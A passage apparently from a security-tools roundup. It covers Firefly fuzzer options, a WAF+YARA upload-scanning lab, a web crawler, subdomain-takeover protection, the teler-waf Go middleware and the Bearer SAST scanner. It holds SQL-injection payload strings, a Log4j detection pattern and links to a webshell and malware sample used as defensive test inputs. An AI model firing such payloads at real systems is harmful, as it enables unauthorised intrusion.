firefly -u 'http://example.com/?query=FUZZ' --timeout 7000

Request with different methods and protocols

firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws

Pipeline

echo 'http://example.com/?query=FUZZ' | firefly 

HTTP Raw

firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'

This will send the raw HTTP request and auto-detect all GET and/or POST parameters to fuzz.

firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ

B=2&C=3' -au replace

Request Verifier

The request verifier is the most important part. This feature lets Firefly learn the core behavior of the target you fuzz. It's important to favor quality over quantity: more verification requests lead to better quality, at the cost of performance (depending on your hardware).

firefly -u 'http://example.com/?query=FUZZ' -e 

Payloads

Payloads can be highly customized, and with a good core wordlist it's possible to fully adapt the payload wordlist within Firefly itself.

Payload debug

Display the format of all payloads and exit

firefly -show-payload

Tampers

List all available tampers

firefly -list-tamper

Tamper all payloads with a given type (more than one can be used, separated by commas)

firefly -u 'http://example.com/?query=FUZZ' -e s2c

Encode

firefly -u 'http://example.com/?query=FUZZ' -e hex

Hex then URL encode all payloads

firefly -u 'http://example.com/?query=FUZZ' -e hex,url

Payload regex replace

firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'

The payloads ' or (1=1)-- - and " or(20=20)or " will result in ' or (13=(37-24))-- - and " or(13=(37-24))or ", where the => (with spaces) indicates the "replace to".
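
In other words, the -pr option behaves like a regex substitution applied to every payload. A minimal Python sketch of the equivalent transformation (illustrative; Firefly itself is written in Go):

import re

def payload_replace(payloads, rule):
    # Split on " => " (with spaces), exactly as the option syntax does
    pattern, replacement = rule.split(" => ", 1)
    return [re.sub(pattern, replacement, p) for p in payloads]

payloads = ["' or (1=1)-- -", '" or(20=20)or "']
print(payload_replace(payloads, r"\([0-9]+=[0-9]+\) => (13=(37-24))"))
# ["' or (13=(37-24))-- -", '" or(13=(37-24))or "']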

Filters

Filter options to filter/match requests that include a given rule.

Filter response to ignore (filter) status code 302 and line count 0

firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0

Filter responses to include (match) regex, and status code 200

firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200

Performance

Performance and time-delay options to use for the request process

Threads / Concurrency

firefly -u 'http://example.com/?query=FUZZ' -t 35

Time delay in milliseconds (ms) for each concurrent thread

firefly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000

Wordlists

Wordlists containing the payloads can be added separately or extracted from a given folder

Single Wordlist with its attack type

firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz

Extract all wordlists inside a folder. The attack type depends on the filename suffix <type>_wordlist.txt

firefly -u 'http://example.com/?query=FUZZ' -w wl/

Example

Wordlist names inside folder wl:

  1. fuzz_wordlist.txt
  2. time_wordlist.txt

Output

JSON output is strongly recommended, because you can use the jq tool to navigate through the results and compare them.

(If Firefly is pipeline chained with other tools, standard plaintext may be a better choice.)

Simple plaintext output format

firefly -u 'http://example.com/?query=FUZZ' -o file.txt

JSON output format (recommended)

firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

Community

Everyone in the community is welcome to suggest new features, improvements and/or new payloads for Firefly; just make a pull request or add a comment with your suggestions!



Wafaray - Enhance Your Malware Detection With WAF + YARA (WAFARAY)

By: Zion3R

WAFARAY is a LAB deployment based on Debian 11.3.0 (stable) x64, made and cooked with two main ingredients, WAF + YARA, to detect malicious files (e.g. webshells, viruses, malware, binaries) typically uploaded through web functions (file uploads).


Purpose

In essence, the main idea is to use WAF + YARA (YARA right-to-left = ARAY) to detect malicious files at the WAF level before the WAF forwards them to the backend, e.g. files uploaded through web functions; see: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

When a web page allows uploading files, most of the WAFs are not inspecting files before sending them to the backend. Implementing WAF + YARA could provide malware detection before WAF forwards the files to the backend.

Do malware detection through WAF?

Yes, one solution is to use ModSecurity + ClamAV. Most pages call ClamAV as a process and not as a daemon; in that case, analysing a file could take more than 50 seconds per file. See this resource: https://kifarunix.com/intercept-malicious-file-upload-with-modsecurity-and-clamav/

Do malware detection through WAF + YARA?

:-( There are only a few clues out there (Black Hat Asia 2019); please continue reading and see our quick LAB deployment below.

WAFARAY: how does it work?

Basically, it is a quick deployment (1) with pre-compiled, ready-to-use YARA rules wired into ModSecurity (WAF) through a custom rule; (2) this custom rule inspects and detects files that might contain malicious code, (3) typically via web upload functions; if a file is suspicious, it is rejected with a 403 Forbidden code by ModSecurity.

✔️The YaraCompile.py script compiles all the yara rules. (Python3 code)
✔️The test.conf file is a virtual host that contains the ModSecurity rules. (ModSecurity code)
✔️The ModSecurity rules call modsec_yara.py in order to inspect the file that is being uploaded. (Python3 code)
✔️Yara returns one of two results: 1 (200 OK) or 0 (403 Forbidden)
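
To give a feel for the Yara side of this pipeline, the sketch below compiles a rules file and scans an uploaded file with the yara-python library, returning the same 1/0 convention described above. It is a simplified illustration with assumed paths, not the project's actual modsec_yara.py.

import sys
import yara

def scan(rules_path, file_path):
    rules = yara.compile(filepath=rules_path)  # compile the .yar rules
    matches = rules.match(file_path)           # scan the uploaded file
    if matches:
        # 0 tells the approver script to reject the upload: 403 Forbidden
        print(f"0 SUSPECTED [YaraSignature: {matches[0].rule}]")
        return 0
    print("1 CLEAN")                           # 1 lets the upload through: 200 OK
    return 1

if __name__ == "__main__":
    scan(sys.argv[1], sys.argv[2])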

Main Paths:

  • Yara Compiled rules: /YaraRules/Compiled
  • Yara Default rules: /YaraRules/rules
  • Yara Scripts: /YaraRules/YaraScripts
  • Apache vhosts: /etc/apache2/sites-enabled
  • Temporal Files: /temporal

Approach

  • Blueteamers: Rule enforcement, best alerting, malware detection on files uploaded through web functions.
  • Redteamers/pentesters: GreyBox scope, upload and bypass with a malicious file, rule enforcement.
  • Security Officers: Keep alerting, threat hunting.
  • SOC: Best monitoring about malicious files.
  • CERT: Malware Analysis, Determine new IOC.

Building Detection Lab

The Proof of Concept is based on the Debian 11.3.0 (stable) x64 OS, OWASP CRS v3.3.2 and Yara 4.0.5. You will find the automatic installation script here: wafaray_install.sh, and an optional manual installation guide here: manual_instructions.txt. A PHP page has also been created as a "mock" to observe the interaction and detection of malicious files using WAF + YARA.

Installation (recommended) with shell scripts

✔️Step 2: Deploy using VMware or VirtualBox
✔️Step 3: Once installed, please follow the instructions below:
alex@waf-labs:~$ su root 
root@waf-labs:/home/alex#

# Remember to change YOUR_USER to your username (e.g. waf)
root@waf-labs:/home/alex# sed -i 's/^\(# User privi.*\)/\1\nalex ALL=(ALL) NOPASSWD:ALL/g' /etc/sudoers
root@waf-labs:/home/alex# exit
alex@waf-labs:~$ sudo sed -i 's/^\(deb cdrom.*\)/#\1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb\-src http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ echo -ne "\n\ndeb http://deb.debian.org/debian/ bullseye main\ndeb-src http://deb.debian.org/debian/ bullseye main\n" | sudo tee -a /etc/apt/sources.list
alex@waf-labs:~$ sudo apt-get update
alex@waf-labs:~$ sudo apt-get install sudo -y
alex@waf-labs:~$ sudo apt-get install git vim dos2unix net-tools -y
alex@waf-labs:~$ git clone https://github.com/alt3kx/wafaray
alex@waf-labs:~$ cd wafaray
alex@waf-labs:~$ dos2unix wafaray_install.sh
alex@waf-labs:~$ chmod +x wafaray_install.sh
alex@waf-labs:~$ sudo ./wafaray_install.sh >> log_install.log

# Test your LAB environment
alex@waf-labs:~$ firefox localhost:8080/upload.php

Yara Rules

Once the Yara Rules were downloaded and compiled.

As with any ModSecurity deployment, you need to customize which kinds of rules to apply. The following log is an example of the Web Application Firewall + Yara detecting a malicious file; in this case, eicar was detected.

Message: Access denied with code 403 (phase 2). File "/temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA" rejected by 
the approver script "/YaraRules/YaraScripts/modsec_yara.py": 0 SUSPECTED [YaraSignature: eicar]
[file "/etc/apache2/sites-enabled/test.conf"] [line "56"] [id "500002"]
[msg "Suspected File Upload:eicar.com.txt -> /temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA - URI: /upload.php"]

Testing WAFARAY... voilà...

Stop / Start ModSecurity

$ sudo service apache2 stop
$ sudo service apache2 start

Apache Logs

$ cd /var/log
$ sudo tail -f apache2/test_access.log apache2/test_audit.log apache2/test_error.log

Demos

Be careful about your test. The following demos were tested on isolated virtual machines.

Demo 1 - EICAR

A malicious file is uploaded, and the ModSecurity rules plus Yara deny the upload to the backend if the file matches at least one Yara rule. (Example of malware: https://secure.eicar.org/eicar.com.txt) DO NOT EXECUTE THE FILE.

Demo 2 - WebShell.php

For this demo, we disabled rule 933110 - PHP Inject Attack to validate the Yara rules. A malicious file is uploaded, and the ModSecurity rules plus Yara deny the upload to the backend if the file matches at least one Yara rule. (Example of a PHP webshell: https://github.com/drag0s/php-webshell) DO NOT EXECUTE THE FILE.

Demo 3 - Malware Bazaar (RecordBreaker) Published: 2022-08-13

A malicious file is uploaded, and the ModSecurity rules plus Yara deny the upload to the backend if the file matches at least one Yara rule. (Example from Malware Bazaar (RecordBreaker): https://bazaar.abuse.ch/sample/94ffc1624939c5eaa4ed32d19f82c369333b45afbbd9d053fa82fe8f05d91ac2/) DO NOT EXECUTE THE FILE.

YARA Rules sources

In case you want to download more yara rules, see the following repositories:

References

Roadmap until next release

  • Malware Hash Database (MLDBM). The database stores the MD5 or SHA1 hashes of files that were detected as suspicious.
  • To be tested: ModSecurity CRS v3.3.3 new rules
  • ModSecurity rules improvement for malware detection with the database.
  • Blacklists and whitelists related to MD5 or SHA1 hashes to be created.
  • To be tested: run in the background if the Yara analysis takes more than 3 seconds.
  • To be tested: new payloads, for example obfuscated PowerShell (webshells)
  • Remarks for live environments. (WAF AWS, WAF GCP, ...)

Authors

Alex Hernandez aka (@_alt3kx_)
Jesus Huerta aka @mindhack03d

Contributors

Israel Zeron Medina aka @spk085



SpiderSuite - Advance Web Spider/Crawler For Cyber Security Professionals

By: Zion3R


An advanced cross-platform and multi-feature GUI web spider/crawler for cyber security professionals. Spider Suite can be used for attack surface mapping and analysis. For more information visit SpiderSuite's website.


Installation and Usage

Spider Suite is designed for easy installation and usage, even for first-timers.

  • First, download the package of your choice.

  • Then install the downloaded SpiderSuite package.

  • See the First time crawling with SpiderSuite article for a tutorial on how to get started.

For complete documentation of Spider Suite see wiki.

Contributing

Can you translate?

Visit SpiderSuite's translation project to make translations to your native language.

Not a developer?

You can help by reporting bugs, requesting new features, improving the documentation, sponsoring the project & writing articles.

For More information see contribution guide.

Contributors

Credits

This product includes software developed by the following open source projects:



Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover

By: Zion3R

OWASP Global AppSec Dublin - talk and demo


Features

  • scan Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
  • scan Cloudflare for vulnerable DNS records
  • take over vulnerable subdomains yourself before attackers and bug bounty researchers
  • automatically create known issues in Bugcrowd or HackerOne
  • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP
  • manual scans of cloud accounts with no installation

Installation

Collaboration

We welcome collaborators! Please see the OWASP Domain Protect website for more details.

Documentation

Manual scans - AWS
Manual scans - CloudFlare
Architecture
Database
Reports
Automated takeover optional feature
Cloudflare optional feature
Bugcrowd optional feature
HackerOne optional feature
Vulnerability types
Vulnerable A records (IP addresses) optional feature
Requirements
Installation
Slack Webhooks
AWS IAM policies
CI/CD
Development
Code Standards
Automated Tests
Manual Tests
Conference Talks and Blog Posts

Limitations

This tool cannot guarantee 100% protection against subdomain takeovers.



Teler-Waf - A Go HTTP Middleware That Provides Teler IDS Functionality To Protect Against Web-Based Attacks And Improve The Security Of Go-based Web Applications

By: Zion3R

teler-waf is a comprehensive security solution for Go-based web applications. It acts as an HTTP middleware, providing an easy-to-use interface for integrating IDS functionality with teler IDS into existing Go applications. By using teler-waf, you can help protect against a variety of web-based attacks, such as cross-site scripting (XSS) and SQL injection.

The package comes with a standard net/http.Handler, making it easy to integrate into your application's routing. When a client makes a request to a route protected by teler-waf, the request is first checked against the teler IDS to detect known malicious patterns. If no malicious patterns are detected, the request is then passed through for further processing.

In addition to providing protection against web-based attacks, teler-waf can also help improve the overall security and integrity of your application. It is highly configurable, allowing you to tailor it to fit the specific needs of your application.


See also:

  • kitabisa/teler: Real-time HTTP intrusion detection.
  • dwisiswant0/cox: Cox is bluemonday-wrapper to perform a deep-clean and/or sanitization of (nested-)interfaces from HTML to prevent XSS payloads.

Features

Some core features of teler-waf include:

  • HTTP middleware for Go web applications.
  • Integration of teler IDS functionality.
  • Detection of known malicious patterns using the teler IDS.
    • Common web attacks, such as cross-site scripting (XSS) and SQL injection.
    • CVEs, covers known vulnerabilities and exploits.
    • Bad IP addresses, such as those associated with known malicious actors or botnets.
    • Bad HTTP referers, such as those that are not expected based on the application's URL structure or are known to be associated with malicious actors.
    • Bad crawlers, covers requests from known bad crawlers or scrapers, such as those that are known to cause performance issues or attempt to extract sensitive information from the application.
    • Directory bruteforce attacks, such as by trying common directory names or using dictionary attacks.
  • Configuration options to whitelist specific types of requests based on their URL or headers.
  • Easy integration with many frameworks.
  • High configurability to fit the specific needs of your application.

Overall, teler-waf provides a comprehensive security solution for Go-based web applications, helping to protect against web-based attacks and improve the overall security and integrity of your application.

Install

To install teler-waf in your Go application, run the following command to download and install the teler-waf package:

go get github.com/kitabisa/teler-waf

Usage

Here is an example of how to use teler-waf in a Go application:

  1. Import the teler-waf package in your Go code:
import "github.com/kitabisa/teler-waf"
  2. Use the New function to create a new instance of the Teler type. This function takes a variety of optional parameters that can be used to configure teler-waf to suit the specific needs of your application.
waf := teler.New()
  3. Use the Handler method of the Teler instance to create a net/http.Handler. This handler can then be used in your application's HTTP routing to apply teler-waf's security measures to specific routes.
handler := waf.Handler(http.HandlerFunc(yourHandlerFunc))
  4. Use the handler in your application's HTTP routing to apply teler-waf's security measures to specific routes.
http.Handle("/path", handler)

That's it! You have configured teler-waf in your Go application.
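
Putting those four steps together, here is a minimal sketch of a complete program; the handler body, route, and listen address are illustrative placeholders:

// main.go - a minimal sketch combining the four steps above.
package main

import (
    "net/http"

    "github.com/kitabisa/teler-waf"
)

func main() {
    // Step 2: create a Teler instance with default options.
    waf := teler.New()

    // Step 3: wrap the handler you want to protect.
    handler := waf.Handler(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        w.Write([]byte("hello world"))
    }))

    // Step 4: route the protected handler and start the server.
    http.Handle("/path", handler)
    http.ListenAndServe("127.0.0.1:3000", nil)
}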

Options:

For a list of the options available to customize teler-waf, see the teler.Options struct.

Examples

Here is an example of how to customize the options and rules for teler-waf:

// main.go
package main

import (
"net/http"

"github.com/kitabisa/teler-waf"
"github.com/kitabisa/teler-waf/request"
"github.com/kitabisa/teler-waf/threat"
)

var myHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// This is the handler function for the route that we want to protect
// with teler-waf's security measures.
w.Write([]byte("hello world"))
})

var rejectHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// This is the handler function for the route that we want to be rejected
// if the teler-waf's security measures are triggered.
http.Error(w, "Sorry, your request has been denied for security reasons.", http.StatusForbidden)
})

func main() {
// Create a new instance of the Teler type using the New function
// and configure it using the Options struct.
telerMiddleware := teler.New(teler.Options{
// Exclude specific threats from being checked by the teler-waf.
Excludes: []threat.Threat{
threat.BadReferrer,
threat.BadCrawler,
},
// Specify whitelisted URIs (path & query parameters), headers,
// or IP addresses that will always be allowed by the teler-waf.
Whitelists: []string{
`(curl|Go-http-client|okhttp)/*`,
`^/wp-login\.php`,
`(?i)Referer: https?:\/\/www\.facebook\.com`,
`192\.168\.0\.1`,
},
// Specify custom rules for the teler-waf to follow.
Customs: []teler.Rule{
{
// Give the rule a name for easy identification.
Name: "Log4j Attack",
// Specify the logical operator to use when evaluating the rule's conditions.
Condition: "or",
// Specify the conditions that must be met for the rule to trigger.
Rules: []teler.Condition{
{
// Specify the HTTP method that the rule applies to.
Method: request.GET,
// Specify the element of the request that the rule applies to
// (e.g. URI, headers, body).
Element: request.URI,
// Specify the pattern to match against the element of the request.
Pattern: `\$\{.*:\/\/.*\/?\w+?\}`,
},
},
},
},
// Specify the file path to use for logging.
LogFile: "/tmp/teler.log",
})

// Set the rejectHandler as the handler for the telerMiddleware.
telerMiddleware.SetHandler(rejectHandler)

// Create a new handler using the handler method of the Teler instance
// and pass in the myHandler function for the route we want to protect.
app := telerMiddleware.Handler(myHandler)

// Use the app handler as the handler for the route.
http.ListenAndServe("127.0.0.1:3000", app)
}

Warning: When using a whitelist, any request that matches it, regardless of the type of threat it poses, will be passed through without further analysis.

To illustrate, suppose you set up a whitelist to permit requests containing a certain string. In the event that a request contains that string, but also includes a payload such as an SQL injection or cross-site scripting (XSS) attack, the request may not be thoroughly analyzed for common web attack threats and will be passed straight through. See issue #25.

For more examples of how to use teler-waf or integrate it with any framework, take a look at the examples/ directory.

Development

By default, teler-waf caches all incoming requests for 15 minutes and clears them every 20 minutes to improve performance. However, if you're still customizing the settings to match the requirements of your application, you can disable caching during development by setting the development mode option to true. This will prevent incoming requests from being cached and can be helpful for debugging purposes.

// Create a new instance of the Teler type using
// the New function & enable development mode option.
telerMiddleware := teler.New(teler.Options{
Development: true,
})

Logs

Here is an example of what the log lines would look like if teler-waf detects a threat on a request:

{"level":"warn","ts":1672261174.5995026,"msg":"bad crawler","id":"654b85325e1b2911258a","category":"BadCrawler","request":{"method":"GET","path":"/","ip_addr":"127.0.0.1:37702","headers":{"Accept":["*/*"],"User-Agent":["curl/7.81.0"]},"body":""}}
{"level":"warn","ts":1672261175.9567692,"msg":"directory bruteforce","id":"b29546945276ed6b1fba","category":"DirectoryBruteforce","request":{"method":"GET","path":"/.git","ip_addr":"127.0.0.1:37716","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}
{"level":"warn","ts":1672261177.1487508,"msg":"Detects common comment types","id":"75412f2cc0ec1cf79efd","category":"CommonWebAttack","request":{"method":"GET","path":"/?id=1%27% 20or%201%3D1%23","ip_addr":"127.0.0.1:37728","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}

The id is a unique identifier that is generated when a request is rejected by teler-waf. It is included in the HTTP response headers of the request (X-Teler-Req-Id), and can be used to troubleshoot issues with requests that are being made to the website.

For example, if a request to a website returns an HTTP error status code, such as a 403 Forbidden, the teler request ID can be used to identify the specific request that caused the error and help troubleshoot the issue.

Teler request IDs are used by teler-waf to track requests made to its web application and can be useful for debugging and analyzing traffic patterns on a website.
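
For instance, a client could surface that header when a request is rejected. Here is a small sketch, assuming the example server above is running locally (the URL and port are placeholders):

// Sketch: read the X-Teler-Req-Id header from a rejected request.
package main

import (
    "fmt"
    "net/http"
)

func main() {
    // A request carrying an obviously malicious query string.
    resp, err := http.Get("http://127.0.0.1:3000/path?id=1%27%20or%201%3D1%23")
    if err != nil {
        panic(err)
    }
    defer resp.Body.Close()

    if resp.StatusCode == http.StatusForbidden {
        // Quote this ID when troubleshooting against the teler-waf logs.
        fmt.Println("rejected, teler request id:", resp.Header.Get("X-Teler-Req-Id"))
    }
}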

Datasets

The teler-waf package utilizes a dataset of threats to identify and analyze each incoming request for potential security threats. This dataset is updated daily, which means that you will always have the latest resource. The dataset is initially stored in the user-level cache directory (on Unix systems, it returns $XDG_CACHE_HOME/teler-waf as specified by XDG Base Directory Specification if non-empty, else $HOME/.cache/teler-waf. On Darwin, it returns $HOME/Library/Caches/teler-waf. On Windows, it returns %LocalAppData%/teler-waf. On Plan 9, it returns $home/lib/cache/teler-waf) on your first launch. Subsequent launches will utilize the cached dataset, rather than downloading it again.

Note: The threat datasets are obtained from the kitabisa/teler-resources repository.
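
The per-OS paths above mirror Go's os.UserCacheDir. As a quick sketch, you can print where the dataset would land on your machine:

// Sketch: print the directory teler-waf would use for its cached datasets.
package main

import (
    "fmt"
    "os"
    "path/filepath"
)

func main() {
    dir, err := os.UserCacheDir()
    if err != nil {
        panic(err)
    }
    fmt.Println(filepath.Join(dir, "teler-waf"))
}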

However, there may be situations where you want to disable automatic updates to the threat dataset. For example, you may have a slow or limited internet connection, or you may be using a machine with restricted file access. In these cases, you can set an option called NoUpdateCheck to true, which will prevent the teler-waf from automatically updating the dataset.

// Create a new instance of the Teler type using the New
// function & disable automatic updates to the threat dataset.
telerMiddleware := teler.New(teler.Options{
NoUpdateCheck: true,
})

Finally, there may be cases where it's necessary to load the threat dataset into memory rather than saving it to a user-level cache directory. This can be particularly useful if you're running the application or service on a distroless or runtime image, where file access may be limited or slow. In this scenario, you can set an option called InMemory to true, which will load the threat dataset into memory for faster access.

// Create a new instance of the Teler type using the
// New function & enable in-memory threat datasets store.
telerMiddleware := teler.New(teler.Options{
InMemory: true,
})

Warning: This may also consume more system resources, so it's worth considering the trade-offs before making this decision.

Resources

Security

If you discover a security issue, please bring it to our attention right away; we take security seriously!

Reporting a Vulnerability

If you have information about a security issue or vulnerability in this teler-waf package, and/or you are able to successfully execute an attack such as cross-site scripting (XSS) and pop up an alert on our demo site (see resources), please do NOT file a public issue; instead, kindly send your report privately via the vulnerability report form or to our official channels as per our security policy.

Limitations

Here are some limitations of using teler-waf:

  • Performance overhead: teler-waf may introduce some performance overhead, as the teler-waf will need to process each incoming request. If you have a high volume of traffic, this can potentially slow down the overall performance of your application significantly, especially if you enable the CVEs threat detection. See benchmark below:
$ go test -bench . -cpu=4
goos: linux
goarch: amd64
pkg: github.com/kitabisa/teler-waf
cpu: 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz
BenchmarkTelerDefaultOptions-4 42649 24923 ns/op 6206 B/op 97 allocs/op
BenchmarkTelerCommonWebAttackOnly-4 48589 23069 ns/op 5560 B/op 89 allocs/op
BenchmarkTelerCVEOnly-4 48103 23909 ns/op 5587 B/op 90 allocs/op
BenchmarkTelerBadIPAddressOnly-4 47871 22846 ns/op 5470 B/op 87 allocs/op
BenchmarkTelerBadReferrerOnly-4 47558 23917 ns/op 5649 B/op 89 allocs/op
BenchmarkTelerBadCrawlerOnly-4 42138 24010 ns/op 5694 B/op 86 allocs/op
BenchmarkTelerDirectoryBruteforceOnly-4 45274 23523 ns/op 5657 B/op 86 allocs/op
BenchmarkTelerCustomRule-4 48193 22821 ns/op 5434 B/op 86 allocs/op
BenchmarkTelerWithoutCommonWebAttack-4 44524 24822 ns/op 6054 B/op 94 allocs/op
BenchmarkTelerWithoutCVE-4 46023 25732 ns/op 6018 B/op 93 allocs/op
BenchmarkTelerWithoutBadIPAddress-4 39205 25927 ns/op 6220 B/op 96 allocs/op
BenchmarkTelerWithoutBadReferrer-4 45228 24806 ns/op 5967 B/op 94 allocs/op
BenchmarkTelerWithoutBadCrawler-4 45806 26114 ns/op 5980 B/op 97 allocs/op
BenchmarkTelerWithoutDirectoryBruteforce-4 44432 25636 ns/op 6185 B/op 97 allocs/op
PASS
ok github.com/kitabisa/teler-waf 25.759s

Note: Benchmarking results may vary and may not be consistent. Those results were obtained when there were >1.5k CVE templates and the teler-resources dataset may have increased since then, which may impact the results.

  • Configuration complexity: Configuring teler-waf to suit the specific needs of your application can be complex, and may require a certain level of expertise in web security. This can make it difficult for those who are not familiar with application firewalls and IDS systems to properly set up and use teler-waf.
  • Limited protection: teler-waf is not a perfect security solution, and it may not be able to protect against all possible types of attacks. As with any security system, it is important to regularly monitor and maintain teler-waf to ensure that it is providing the desired level of protection.

Known Issues

To view a list of known issues with teler-waf, please filter the issues by the "known-issue" label.

License

This program is developed and maintained by members of Kitabisa Security Team, and this is not an officially supported Kitabisa product. This program is free software: you can redistribute it and/or modify it under the terms of the Apache license. Kitabisa teler-waf and any contributions are copyright © by Dwi Siswanto 2022-2023.



Bearer - Code Security Scanning Tool (SAST) That Discover, Filter And Prioritize Security Risks And Vulnerabilities Leading To Sensitive Data Exposures (PII, PHI, PD)


Discover, filter, and prioritize security risks and vulnerabilities impacting your code.

Bearer is a static application security testing (SAST) tool that scans your source code and analyzes your data flows to discover, filter and prioritize security risks and vulnerabilities leading to sensitive data exposures (PII, PHI, PD).

Currently supporting JavaScript and Ruby stacks.

Code security scanner that natively filters and prioritizes security risks using sensitive data flow analysis.

Bearer provides built-in rules against a common set of security risks and vulnerabilities, known as the OWASP Top 10. Here are some practical examples of what those rules look for:

  • Non-filtered user input.
  • Leakage of sensitive data through cookies, internal loggers, third-party logging services, and into analytics environments.
  • Usage of weak encryption libraries or misusage of encryption algorithms.
  • Unencrypted incoming and outgoing communication (HTTP, FTP, SMTP) of sensitive information.
  • Hard-coded secrets and tokens.

And many more.

Bearer is Open Source (see license) and fully customizable, from creating your own rules to component detection (database, API) and data classification.

Bearer also powers our commercial offering, Bearer Cloud, allowing security teams to scale and monitor their application security program using the same engine.

Getting started

Discover your most critical security risks and vulnerabilities in only a few minutes. In this guide, you will install Bearer, run a scan on a local project, and view the results. Let's get started!

Install Bearer

The quickest way to install Bearer is with the install script. It will auto-select the best build for your architecture. Installation defaults to ./bin and to the latest release version:

curl -sfL https://raw.githubusercontent.com/Bearer/bearer/main/contrib/install.sh | sh

Other install options


Homebrew

Using Bearer's official Homebrew tap:

brew install bearer/tap/bearer

Debian/Ubuntu
$ sudo apt-get install apt-transport-https
$ echo "deb [trusted=yes] https://apt.fury.io/bearer/ /" | sudo tee -a /etc/apt/sources.list.d/fury.list
$ sudo apt-get update
$ sudo apt-get install bearer

RHEL/CentOS

Add repository setting:

$ sudo vim /etc/yum.repos.d/fury.repo
[fury]
name=Gemfury Private Repo
baseurl=https://yum.fury.io/bearer/
enabled=1
gpgcheck=0

Then install with yum:

$ sudo yum -y update
$ sudo yum -y install bearer

Docker

Bearer is also available as a Docker image on Docker Hub and ghcr.io.

With docker installed, you can run the following command with the appropriate paths in place of the examples.

docker run --rm -v /path/to/repo:/tmp/scan bearer/bearer:latest-amd64 scan /tmp/scan

Additionally, you can use docker compose. Add the following to your docker-compose.yml file and replace the volumes with the appropriate paths for your project:

version: "3"
services:
bearer:
platform: linux/amd64
image: bearer/bearer:latest-amd64
volumes:
- /path/to/repo:/tmp/scan

Then, run the docker compose run command to run Bearer with any specified flags:

docker compose run bearer scan /tmp/scan --debug

Binary

Download the archive file for your operating system/architecture from here.

Unpack the archive, and put the binary somewhere in your $PATH (on UNIX-y systems, /usr/local/bin or the like). Make sure it has permission to execute.


Scan your project

The easiest way to try out Bearer is with our example project, Bear Publishing. It simulates a realistic Ruby application with common security flaws. Clone or download it to a convenient location to get started.

git clone https://github.com/Bearer/bear-publishing.git

Now, run the scan command with bearer scan on the project directory:

bearer scan bear-publishing

A progress bar will display the status of the scan.

Once the scan is complete, Bearer will output a security report with details of any rule failures, as well as where in the codebase the infractions happened and why.

By default, the scan command uses the SAST scanner; other scanner types are available.

Analyze the report

The security report is an easily digestible view of the security issues detected by Bearer. A report is made up of:

  • The list of rules run against your code.
  • Each detected failure, containing the file location and lines that triggered the rule failure.
  • A stats section with a summary of rule checks, failures and warnings.

The Bear Publishing example application will trigger rule failures and output a full report. Here's a section of the output:

...
CRITICAL: Only communicate using SFTP connections.
https://docs.bearer.com/reference/rules/ruby_lang_insecure_ftp

File: bear-publishing/app/services/marketing_export.rb:34

34 Net::FTP.open(
35 'marketing.example.com',
36 'marketing',
37 'password123'
...
41 end


=====================================

56 checks, 10 failures, 6 warnings

CRITICAL: 7
HIGH: 0
MEDIUM: 0
LOW: 3
WARNING: 6

The security report is just one report type available in Bearer.

Additional options for using and configuring the scan command can be found in the scan documentation.

For additional guides and usage tips, view the docs.

FAQs

How do you detect sensitive data flows from the code?

When you run Bearer on your codebase, it discovers and classifies data by identifying patterns in the source code. Specifically, it looks for data types and matches against them. Most importantly, it never views the actual values (it just can’t), only the code itself.

Bearer assesses 120+ data types from sensitive data categories such as Personal Data (PD), Sensitive PD, Personally identifiable information (PII), and Personal Health Information (PHI). You can view the full list in the supported data types documentation.

In a nutshell, our static code analysis is performed on two levels:

  • Analyzing class names, methods, functions, variables, properties, and attributes, then tying those together to detect data structures and performing variable reconciliation.
  • Analyzing data structure definition files such as OpenAPI, SQL, GraphQL, and Protobuf.

Bearer then passes this over to the classification engine we built to support this very particular discovery process.

If you want to learn more, here is the longer explanation.

When and where to use Bearer?

We recommend running Bearer in your CI to automatically check new PRs for security issues, so your development team has a direct feedback loop to fix issues immediately.

You can also integrate Bearer in your CD, though we recommend making it fail only on high-criticality issues, as the impact on your organization might be significant.

In addition, running Bearer on a scheduled job is a great way to keep track of your security posture and make sure new security issues are found even in projects with low activity.

Supported Languages

Bearer currently supports JavaScript and Ruby, along with their most commonly used frameworks and libraries. More languages will follow.

What makes Bearer different from any other SAST tools?

SAST tools are known to bury security teams and developers under hundreds of issues with little context and no sense of priority, often requiring security analysts to triage issues. Not Bearer.

The most vulnerable asset today is sensitive data, so we start there and prioritize application security risks and vulnerabilities by assessing sensitive data flows in your code to highlight what is urgent, and what is not.

We believe that by linking security issues with a clear business impact and risk of a data breach, or data leak, we can build better and more robust software, at no extra cost.

In addition, by being Open Source, extendable by design, and built with a great developer UX in mind, we bet you will see the difference for yourself.

How long does it take to scan my code? Is it fast?

It depends on the size of your applications. It can take as little as 20 seconds, up to a few minutes for an extremely large code base. We’ve added an internal caching layer that only looks at delta changes to allow quick, subsequent scans.

Running Bearer should not take more time than running your test suite.

What about false positives?

If you’re familiar with other SAST tools, false positives are always a possibility.

